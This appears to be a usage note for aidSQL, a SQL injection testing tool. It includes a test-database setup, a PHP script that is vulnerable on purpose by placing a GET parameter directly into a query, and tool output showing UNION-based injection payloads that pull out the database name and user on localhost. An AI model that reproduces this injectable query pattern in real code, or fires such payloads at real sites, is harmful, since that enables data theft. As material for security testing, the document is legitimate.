This should do the trick, for now ...
php launcher.php --url=url --urlvars=var=value --verbose

For instance:

php launcher.php --url=http://localhost/~jimmy/test.php --urlvars=id=1


---------------------------------------------------
Database Script
---------------------------------------------------

CREATE DATABASE aidsqltest;

GRANT ALL PRIVILEGES ON aidsqltest.* TO "youruser"@"localhost" IDENTIFIED BY "password_here";

USE aidsqltest;

CREATE TABLE test_table ( id INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY, description varchar(200) default "description" );

INSERT INTO test_table SET description="This is aidsql nice to meet you";
INSERT INTO test_table SET id="";
INSERT INTO test_table SET id="";
INSERT INTO test_table SET id="";

---------------------------------------------------
PHP test Script
---------------------------------------------------

<?php

      if($_SERVER["REMOTE_ADDR"]!=="127.0.0.1"){   //Remove this IF you don't need it this will *somewhat* avoid
         die("<h1>For your health</h1>!");         //other people to be able to access this script at all.
      }

      error_reporting(E_ALL);
      ini_set("display_errors","1");

      $host = "localhost";       //Replace with your own host
      $db   = "aidsqltest";      //Replace with your own DB
      $user = "root";            //Replace with your own user
      $pass = "viceroynextbic";  //Replace with your own password, "" if none

      mysql_connect($host,$user,$pass) or die ("Can't connect to the database :(");
      mysql_select_db($db);

      $sql = "SELECT id,description FROM test_table WHERE id=$_GET[id]";

        echo $sql."\n";

        $res = mysql_query($sql);
        echo "<h2>ERROR:".mysql_error()."</h2>";

        while($row = mysql_fetch_array($res,MYSQL_ASSOC)){
                echo "<h2>".$row["id"]."</h2>\n";
                echo "<h2>".$row["description"]."</h2>\n";
        }

?>


The output should look something like this:
-------------------------------------------

jimmy@hardcore:~/Projects/aidsql>php launcher.php --url=http://localhost/~jimmy/test.php --urlvars=id=1
Testing aidSQL\plugin\MySQL5 injection plugin...
[id] Attempt:   1
Fetching http://localhost/~jimmy/test.php/?id=1+UNION+ALL+SELECT+CONCAT%280x6934366664%2C1%2C0x6930623732%29+LIMIT+1%2C1

String identifier is: i46fd - i0b72
[id] Attempt:   2
Fetching http://localhost/~jimmy/test.php/?id=1+UNION+ALL+SELECT+CONCAT%280x6934366664%2C1%2C0x6930623732%29%2CCONCAT%280x6934366664%2C2%2C0x6930623732%29+LIMIT+1%2C1

String identifier is: i46fd - i0b72
FOUND SQL INJECTION!!!

Affected Variable:      id
Affected Fields:        1,2
Picking field "1" to perform further analysis ...
Site is vulnerable to sql injection
Fetching http://localhost/~jimmy/test.php/?id=1+UNION+ALL+SELECT+CONCAT%280x6934366664%2CDATABASE%28%29%2C0x6930623732%29%2C2+LIMIT+1%2C1

String identifier is: i46fd - i0b72
Fetching http://localhost/~jimmy/test.php/?id=1+UNION+ALL+SELECT+CONCAT%280x6934366664%2CUSER%28%29%2C0x6930623732%29%2C2+LIMIT+1%2C1

String identifier is: i46fd - i0b72
BASIC INFORMATION
-----------------------------------
DBASE   :               aidsqltest
DBUSER  :               root@localhost


